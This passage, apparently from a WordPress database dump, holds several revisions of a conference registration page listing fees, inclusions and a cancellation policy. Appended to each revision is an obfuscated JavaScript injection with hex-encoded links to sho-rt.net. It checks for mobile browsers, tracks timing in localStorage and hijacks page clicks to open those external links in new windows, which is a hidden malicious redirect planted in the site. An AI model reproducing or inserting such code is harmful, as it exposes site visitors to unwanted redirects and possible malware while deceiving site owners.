g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2022-10-09 01:22:42','2022-10-09 01:22:42','',2638,'https://gsw2023.com/?p=2651',0,'revision','',0),
(2652,1,'2022-10-09 01:23:57','2022-10-09 01:23:57','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h1 style=\"text-align: justify; color: red;\"><strong><span style=\"font-size: 16px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h1>\r\n<div class=\"three_quarter first\"><section class=\"clear\">\r\n<h4>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</h4>\r\n</section></div>\r\n[/bsf-info-box][ultimate_info_table color_scheme=\"blue\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td rowspan=\"2\"></td>\r\n<td colspan=\"3\"><strong>Standard</strong></td>\r\n<td colspan=\"3\"><strong>Student/Senior</strong></td>\r\n<td colspan=\"3\"><strong>Accompanying person</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n</tr>\r\n<tr>\r\n<td>1 Day</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$200</td>\r\n<td> $250</td>\r\n<td>$100</td>\r\n<td>$100</td>\r\n<td>$125</td>\r\n</tr>\r\n<tr>\r\n<td>2 Days</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td> $200</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$125</td>\r\n<td>$125</td>\r\n<td>$150</td>\r\n</tr>\r\n<tr>\r\n<td>3 Days</td>\r\n<td> $450</td>\r\n<td>$500</td>\r\n<td>$550</td>\r\n<td> $250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$150</td>\r\n<td>$175</td>\r\n</tr>\r\n<tr>\r\n<td>4 Days</td>\r\n<td>$550</td>\r\n<td>$600</td>\r\n<td>$650</td>\r\n<td>$300</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$175</td>\r\n<td>$175</td>\r\n<td>$200</td>\r\n</tr>\r\n<tr>\r\n<td>5 Days</td>\r\n<td> $650</td>\r\n<td>$700</td>\r\n<td>$750</td>\r\n<td>$350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td>$200</td>\r\n<td>$200</td>\r\n<td>$225</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/ultimate_info_table][bsf-info-box icon_size=\"32\"]\r\n<h2>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</h2>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Standard and student / senior (over 65) registration fees include:</h5>\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6>Entry to all sessions/workshops;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Entry to the Exhibition;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Copy of Final Programme;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Lunches;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Accompanying person fee includes:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Entry to Opening Session;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Cancellation policy:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</h6>\r\n</li>\r\n</ul>\r\n<h5 style=\"text-align: justify; color: red;\">-Two Social Dinners Will Be Organized On Tuesday And Thursday.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2022-10-09 01:23:57','2022-10-09 01:23:57','',2638,'https://gsw2023.com/?p=2652',0,'revision','',0),
(2653,1,'2022-10-09 01:24:29','2022-10-09 01:24:29','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h1 style=\"text-align: justify; color: red;\"><strong><span style=\"font-size: 22px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h1>\r\n<div class=\"three_quarter first\"><section class=\"clear\">\r\n<h4>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</h4>\r\n</section></div>\r\n[/bsf-info-box][ultimate_info_table color_scheme=\"blue\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td rowspan=\"2\"></td>\r\n<td colspan=\"3\"><strong>Standard</strong></td>\r\n<td colspan=\"3\"><strong>Student/Senior</strong></td>\r\n<td colspan=\"3\"><strong>Accompanying person</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n</tr>\r\n<tr>\r\n<td>1 Day</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$200</td>\r\n<td> $250</td>\r\n<td>$100</td>\r\n<td>$100</td>\r\n<td>$125</td>\r\n</tr>\r\n<tr>\r\n<td>2 Days</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td> $200</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$125</td>\r\n<td>$125</td>\r\n<td>$150</td>\r\n</tr>\r\n<tr>\r\n<td>3 Days</td>\r\n<td> $450</td>\r\n<td>$500</td>\r\n<td>$550</td>\r\n<td> $250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$150</td>\r\n<td>$175</td>\r\n</tr>\r\n<tr>\r\n<td>4 Days</td>\r\n<td>$550</td>\r\n<td>$600</td>\r\n<td>$650</td>\r\n<td>$300</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$175</td>\r\n<td>$175</td>\r\n<td>$200</td>\r\n</tr>\r\n<tr>\r\n<td>5 Days</td>\r\n<td> $650</td>\r\n<td>$700</td>\r\n<td>$750</td>\r\n<td>$350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td>$200</td>\r\n<td>$200</td>\r\n<td>$225</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/ultimate_info_table][bsf-info-box icon_size=\"32\"]\r\n<h2>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</h2>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Standard and student / senior (over 65) registration fees include:</h5>\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6>Entry to all sessions/workshops;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Entry to the Exhibition;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Copy of Final Programme;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Lunches;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Accompanying person fee includes:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Entry to Opening Session;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Cancellation policy:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</h6>\r\n</li>\r\n</ul>\r\n<h5 style=\"text-align: justify; color: red;\">-Two Social Dinners Will Be Organized On Tuesday And Thursday.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 